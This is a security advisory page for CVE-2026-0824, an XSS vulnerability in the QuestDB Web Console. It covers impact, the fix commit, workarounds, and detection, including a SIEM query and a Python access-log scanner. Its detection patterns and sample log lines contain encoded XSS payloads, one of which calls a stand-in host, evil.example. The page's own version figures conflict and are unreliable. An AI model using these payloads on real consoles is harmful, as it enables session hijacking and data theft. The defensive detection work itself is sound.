CVE-2026-0824
📋 TL;DR
A cross-site scripting (XSS) vulnerability exists in QuestDB UI, the Web Console that QuestDB serves from its HTTP port. An attacker who can get a console user to load crafted content gets script running in that user's browser, with that user's session to the database. This page quotes the affected UI versions as 1.11.9 and earlier and the fix as 1.1.10, which are inconsistent; treat the fix commit and the QuestDB 9.3.0 release (see Fix & Mitigation) as the authoritative boundary and assume any earlier console build is affected.
💻 Affected Systems
- QuestDB UI (Web Console), whether deployed standalone or as bundled in QuestDB server releases before 9.3.0
⚠️ Manual Verification Required
The NVD entry for this CVE does not carry affected-version ranges, so version-based scanners cannot decide on their own whether a given install is affected; you have to confirm it manually.
Why? No version ranges were supplied by the vendor or NVD, only the fix commit and the QuestDB 9.3.0 release.
- Review the CVE details at NVD
- Check the QuestDB 9.3.0 release notes and the questdb/ui fix commit (see References) against the build you run
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Script injected into the console runs with the victim's authenticated session, so an attacker can issue any SQL the victim is allowed to run through the HTTP API (`/exec`): read and exfiltrate data, and where the victim has write access, modify or drop tables. Session tokens, credentials typed into the console, and the page itself (defacement, redirection to a phishing site) are also exposed. The impact stops at what the victim's browser session can reach; the advisory does not describe server-side code execution.
Likely Case
An attacker lures an authenticated console user to a crafted link, or plants the payload in data the console renders, and the injected script silently runs queries via `/exec` in the victim's session and ships the results to an attacker-controlled host.
If Mitigated
Proper output encoding in the console (what the vendor fix adds) removes the injection entirely. Short of patching, a Content Security Policy that blocks inline and third-party script, plus network restrictions on the HTTP port, reduce a residual injection to cosmetic interface manipulation with no data exfiltration path.
🎯 Exploit Status
A public write-up with exploit details exists on GitHub (see References). Exploitation is client-side: the attacker needs a console user to load the crafted content in a browser, so this is weaponizable through phishing links or attacker-influenced data rather than as unauthenticated remote code execution against the server.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.1.10 or QuestDB 9.3.0
Vendor Advisory: https://github.com/questdb/questdb/releases/tag/9.3.0
Restart Required: Yes
Instructions:
1. Upgrade QuestDB to 9.3.0 or later (the bundled Web Console carries the fix), or, for a standalone console, to the UI release that contains the fix commit. Note that the "1.1.10" fix version quoted above does not line up with the "1.11.9" affected version quoted elsewhere on this page; the commit is the reliable marker.
2. Restart the QuestDB service so the new console assets are served.
3. If you build the console from source, confirm that commit b42fd9f18476d844ae181a10a249e003dafb823d is in your tree, for example with `git merge-base --is-ancestor b42fd9f18476d844ae181a10a249e003dafb823d HEAD` in the questdb/ui checkout.
🔧 Temporary Workarounds
Disable Web Console
Temporarily take the vulnerable Web Console off the network to prevent exploitation.
QuestDB's HTTP server serves both the REST API and the Web Console, so disabling it (the `http.enabled=false` setting in server.conf, per the QuestDB configuration reference; verify the key for your release) removes both. Only do this where nothing depends on the HTTP endpoints; otherwise restrict the port at the network layer instead (see below).
Implement WAF Rules
Configure a web application firewall in front of the QuestDB HTTP port to block XSS payloads aimed at the console.
Add XSS detection rules to your WAF configuration, but treat them as a stopgap: the console legitimately submits SQL containing quotes and angle brackets, so naive rules produce false positives, and rules that do not decode percent- and entity-encoding before matching are trivially bypassed.
🧯 If You Can't Patch
- Serve the console behind a reverse proxy that adds a Content Security Policy blocking inline and third-party script. Roll it out as `Content-Security-Policy-Report-Only` first, because the console needs its own scripts to run and an untested policy can break it.
- Restrict the QuestDB HTTP port (9000 by default) to trusted networks or a VPN, and require authentication at the proxy so an injected script cannot be reached by an anonymous attacker's victim.
🔍 How to Verify
Check if Vulnerable:
Treat any Web Console build that predates the fix commit (or any QuestDB release before 9.3.0) as vulnerable; the "1.11.9 or earlier" figure quoted on this page conflicts with the "1.1.10" fix version, so do not rely on the version number alone. Review access logs for script fragments (including percent- or entity-encoded ones) in requests to the console and `/exec`.
Check Version:
For a server install, check the QuestDB release version of the binary or container image (9.3.0 or later carries the fix). For a console built from source, check the package metadata in the questdb/ui checkout and whether the fix commit is an ancestor of the build.
Verify Fix Applied:
Confirm the running server is QuestDB 9.3.0 or later, or that the standalone console was built from a tree containing commit b42fd9f18476d844ae181a10a249e003dafb823d. Then reload the console in a browser and confirm the new assets are being served (old assets can persist in a browser or proxy cache).
📡 Detection & Monitoring
Log Indicators:
- HTML tags, `javascript:` URIs, or event-handler attributes (`onerror=`, `onload=`) in request query strings or SQL text sent to the QuestDB HTTP port, including percent- or entity-encoded forms
- Repeated probe requests of that kind from one source, often producing 400 responses from `/exec` because the payload is not valid SQL
Network Indicators:
- HTTP requests carrying script injection payloads to the Web Console path or `/exec`
- Outbound connections from console users' workstations (not the QuestDB server, since the script runs in the victim's browser) to unfamiliar hosts shortly after they used the console
SIEM Query:
source="questdb" AND (http_request CONTAINS "<script>" OR http_request CONTAINS "javascript:" OR http_request CONTAINS "onerror=" OR http_request CONTAINS "onload=")
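The SIEM query above is a plain substring match: it misses payloads that arrive percent- or entity-encoded and it will flag legitimate SQL containing `<`. The following is an added example, not code from the advisory or from QuestDB, showing the decoding and path-aware matching a detection should do. It parses combined-format access log lines from a proxy in front of QuestDB (the log format and the sample lines are constructed for this example), peels off stacked encoding, and reports which indicator fired. The indicator list is a triage heuristic, not a complete XSS grammar.

```python
"""Scan access logs in front of QuestDB for XSS probes against the Web Console.

Added example (not part of the original advisory or QuestDB). The log format
regex assumes Apache/nginx combined format; the sample lines are constructed.
"""
import html
import re
from urllib.parse import unquote_plus

# Combined-log-format line. Adjust if your proxy logs a different format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Indicators are matched AFTER decoding, so %3Cscript%3E and &lt;script&gt;
# are caught. Event handlers are an explicit list to avoid matching SQL such
# as "where one = 1".
INDICATORS = {
    "script_tag": re.compile(r"<\s*/?\s*script\b", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "event_handler": re.compile(
        r"\bon(error|load|mouseover|focus|click|toggle|animationstart)\s*=", re.I
    ),
    "html_injection": re.compile(r"<\s*(img|svg|iframe|object|embed|body)\b", re.I),
}


def decode_layers(value, rounds=3):
    """Peel off stacked URL and HTML-entity encoding (double encoding is a
    common filter-evasion trick) until the string stops changing."""
    for _ in range(rounds):
        decoded = html.unescape(unquote_plus(value))
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line):
    """Return (client_ip, raw_target, [indicator names]) for a suspicious
    request, or None if the line does not parse or nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_layers(m.group("target"))
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    if not hits:
        return None
    return m.group("ip"), m.group("target"), hits


def scan(lines):
    """Scan an iterable of log lines; returns only the suspicious ones."""
    return [r for r in (scan_line(line) for line in lines) if r]


# Constructed sample lines (not real traffic). Line 2 is a double-encoded probe
# that a plain substring match on "<script>" misses; line 3 is a legitimate
# console query that contains "<" and must not alert; line 4 is a handler-based
# payload submitted as SQL, which QuestDB's /exec rejects with a 400.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Feb/2026:10:00:01 +0000] "GET /exec?query=select%20*%20from%20trades HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Feb/2026:10:00:07 +0000] "GET /index.html?q=%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 2048',
    '10.0.0.5 - - [01/Feb/2026:10:00:09 +0000] "GET /exec?query=select%20*%20from%20trades%20where%20price%20%3C%2010 HTTP/1.1" 200 300',
    '203.0.113.9 - - [01/Feb/2026:10:00:12 +0000] "GET /exec?query=%3Cimg%20src%3Dx%20onerror%3Dfetch(%27//evil.example/%27)%3E HTTP/1.1" 400 90',
]

if __name__ == "__main__":
    for ip, target, hits in scan(SAMPLE_LOG):
        print(f"{ip} {target} -> {', '.join(hits)}")
```

Only request targets are inspected here; payloads submitted in a POST body (the console can send SQL that way) are not in a standard access log, so pair this with request-body logging at the proxy if you need that coverage.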
🔗 References
- https://github.com/59lab/dbdb/blob/main/There%20is%20a%20cross-site%20scripting(XSS)%20vulnerability%20in%20the%20QuestDB%20database.md
- https://github.com/questdb/questdb/releases/tag/9.3.0
- https://github.com/questdb/ui/
- https://github.com/questdb/ui/commit/b42fd9f18476d844ae181a10a249e003dafb823d
- https://github.com/questdb/ui/pull/518
- https://github.com/questdb/ui/pull/519#issue-3790862030
- https://vuldb.com/?ctiid.340357
- https://vuldb.com/?id.340357
- https://vuldb.com/?submit.733253